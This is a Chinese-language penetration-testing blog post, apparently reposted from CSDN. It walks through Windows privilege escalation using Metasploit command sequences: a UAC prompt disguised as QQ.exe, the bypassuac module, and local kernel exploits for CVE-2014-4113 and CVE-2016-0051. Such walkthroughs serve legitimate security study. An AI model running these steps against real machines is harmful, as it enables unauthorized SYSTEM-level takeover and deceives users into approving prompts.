UAC提权

UAC点击提权

  1. 使用getuid命令时发现是个普通用户,并且尝试得到system权限失败
    在这里插入图片描述
  2. 这里我们使用另一个msf的漏洞利用模块
background
back
use exploit/windows/local/ask
info
show options
set session 3
set filename QQ.exe
run

在这里插入图片描述

  • 注:这里说明一下,session的ID是权限低的账户时的id号
  • 提权成功后使用getsystem命令即可进行提权成功
  • 这种方法需要用户在UAC对话框上点击是,只要稍微有点计算机安全知识的都会觉得这样的操作非常可疑,这种方法只针对安全意识比较薄弱的用户,因此下面将介绍直接的UAC绕过提权

UAC绕过提权

  1. 使用msf的bypassuac这个模块绕过uac认证
use exploit/windows/local/bypassuac
set session 5
exploit

在这里插入图片描述
在这里插入图片描述
直接提权成功,无需用户交互

利用提权漏洞进行提权

  1. 利用windows系统的漏洞ms14_058_track_popup_menu进行提权,这是一个CVE-2014-4113漏洞
back
use exploit/windows/local/ms14_058_track_popup_menu
exploit
  • 攻击完成后可以知道,权限已经是system权限
    在这里插入图片描述
  1. 其实Windows7可利用提权的漏洞还是挺多的,这里还有一个ms16_016_webdav,这是一个CVE-2016-0051漏洞
use exploit/windows/local/ms16_016_webdav
set session 4
exploit

在这里插入图片描述

总结:其实windows系统的本地提权漏洞每年都会出很多,有些用户安全意识好的话会去打补丁,但是不排除个别疏忽的,拿到一个普通用户权限去再提升为超级管理员权限是每个渗透测试者的最终目标!

猜你喜欢

转载自blog.csdn.net/weixin_45007073/article/details/112907954